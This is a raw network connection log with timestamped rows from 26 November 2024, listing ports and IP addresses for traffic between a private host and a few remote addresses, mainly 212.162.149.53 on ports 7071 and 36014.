Nov 26, 2024 09:01:28.459009886 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.460854053 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.460977077 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.461019993 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.462857008 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.462976933 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.463017941 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.464941978 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.465085030 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.465125084 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.466903925 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.466989040 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.467041969 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.468926907 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.468977928 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.469028950 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.470921040 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.471028090 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.471069098 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.473022938 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.473169088 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.473215103 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.474944115 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.475033998 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.475079060 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.476999998 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.477145910 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.477212906 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.479001045 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.479105949 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.479182959 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.480978966 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.481115103 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.481156111 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.483068943 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.483163118 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.483207941 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.484945059 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.485059977 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.485105991 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.487015963 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.487107992 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.487150908 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.487260103 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.489049911 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.489155054 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.489197969 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.490977049 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.491089106 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.491127968 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.492959976 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.493047953 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.493088961 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.494997978 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.495073080 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.495111942 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.501519918 CET	49729	443	192.168.2.5	104.26.12.205
Nov 26, 2024 09:01:28.501564980 CET	443	49729	104.26.12.205	192.168.2.5
Nov 26, 2024 09:01:28.501627922 CET	49729	443	192.168.2.5	104.26.12.205
Nov 26, 2024 09:01:28.502490044 CET	49729	443	192.168.2.5	104.26.12.205
Nov 26, 2024 09:01:28.502507925 CET	443	49729	104.26.12.205	192.168.2.5
Nov 26, 2024 09:01:28.540191889 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.540294886 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.540357113 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.577991009 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.578073025 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.578125954 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.578957081 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.579061031 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.579101086 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.581043005 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.581152916 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.581192017 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.582983971 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.583065033 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.583107948 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.585108042 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.585237980 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.585273981 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.587089062 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.587176085 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.587219954 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.589297056 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.589436054 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.589483023 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.607187986 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.645366907 CET	443	49726	172.67.177.134	192.168.2.5
Nov 26, 2024 09:01:28.645432949 CET	443	49726	172.67.177.134	192.168.2.5
Nov 26, 2024 09:01:28.645478964 CET	49726	443	192.168.2.5	172.67.177.134
Nov 26, 2024 09:01:28.661324024 CET	49726	443	192.168.2.5	172.67.177.134
Nov 26, 2024 09:01:29.136303902 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.184864044 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.235341072 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.270782948 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.355369091 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.355395079 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.355438948 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.355449915 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.355470896 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.355490923 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.355525970 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.355551958 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.355598927 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.355631113 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.355726957 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.355737925 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.355748892 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.355748892 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.355762959 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.355824947 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.390712976 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.390846968 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.392860889 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.475672007 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.475694895 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.475739956 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.475770950 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.475784063 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.475817919 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.475917101 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.475951910 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.475991011 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.476044893 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.476049900 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.476080894 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.476090908 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.476119995 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.476161003 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.476185083 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.476191998 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.476227999 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.476248980 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.476286888 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.476357937 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.476432085 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.476455927 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.476547956 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.512934923 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.596282959 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.596414089 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.596452951 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.596494913 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.596534014 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.596668005 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.596730947 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.596761942 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.596810102 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.596849918 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.596923113 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.596951008 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.597027063 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.597064018 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.597075939 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.597158909 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.597235918 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.597270966 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.597318888 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.597336054 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.597357035 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.597398996 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.597434044 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.597481966 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.597518921 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.597564936 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.597574949 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.597590923 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.597645998 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.597656965 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.597666979 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.597747087 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.597757101 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.597805023 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.597822905 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.597832918 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.597889900 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.597929955 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.597944975 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.597995043 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.597997904 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.598006010 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.598037958 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.598056078 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.598108053 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.716634989 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.716829062 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.716890097 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.716908932 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.716943026 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.716964006 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.716990948 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.717030048 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.717142105 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.717154026 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.717195988 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.717222929 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.717236996 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.717305899 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.717329025 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.717356920 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.717381001 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.717459917 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.717508078 CET	443	49729	104.26.12.205	192.168.2.5
Nov 26, 2024 09:01:29.717510939 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.717590094 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.717609882 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.717612028 CET	49729	443	192.168.2.5	104.26.12.205
Nov 26, 2024 09:01:29.717737913 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.717823029 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.717981100 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.718031883 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.718137980 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.718153000 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.718240976 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.718261003 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.718377113 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.718386889 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.718477964 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.718487024 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.718548059 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.718620062 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.718653917 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.718733072 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.718812943 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.718832970 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.718957901 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.718966961 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.719091892 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.719105005 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.719115973 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.719162941 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.719175100 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.719301939 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.719338894 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.719382048 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.719405890 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.719423056 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.719515085 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.719525099 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.719533920 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.719614029 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.719630957 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.719764948 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.719774008 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.719845057 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.719855070 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.719959021 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.719971895 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.720043898 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.720060110 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.720160007 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.720171928 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.720216990 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.720233917 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.720304012 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.720341921 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.720361948 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.720371962 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.720447063 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.720480919 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.720549107 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.720588923 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.720664024 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.720693111 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.720771074 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.721971035 CET	49729	443	192.168.2.5	104.26.12.205
Nov 26, 2024 09:01:29.721993923 CET	443	49729	104.26.12.205	192.168.2.5
Nov 26, 2024 09:01:29.722301960 CET	443	49729	104.26.12.205	192.168.2.5
Nov 26, 2024 09:01:29.728142977 CET	49729	443	192.168.2.5	104.26.12.205
Nov 26, 2024 09:01:29.775326967 CET	443	49729	104.26.12.205	192.168.2.5
Nov 26, 2024 09:01:29.837158918 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.837183952 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.837296009 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.837380886 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.837486982 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.837496996 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.837523937 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.837585926 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.837598085 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.837701082 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.837742090 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.837827921 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.837862015 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.837944031 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.837954044 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.838005066 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.838073969 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.838179111 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.838222027 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.838232040 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.838469028 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.838552952 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.839257956 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.839433908 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.839489937 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.839564085 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.839581966 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.839708090 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.839754105 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.839884043 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.839920044 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.840003014 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.840046883 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.840183020 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.840192080 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.840239048 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.840292931 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.840415955 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.840471983 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.840517998 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.840581894 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.840651989 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.840692997 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.840781927 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.840862989 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.840873003 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.840883970 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.840970039 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.841001034 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.841103077 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.841139078 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.841204882 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.841216087 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.841306925 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.841319084 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.841424942 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.841437101 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.841552019 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.841564894 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.841727972 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.841768980 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.841819048 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.841943026 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.841953039 CET	36014	49707	212.162.149.53	192.168.2.5
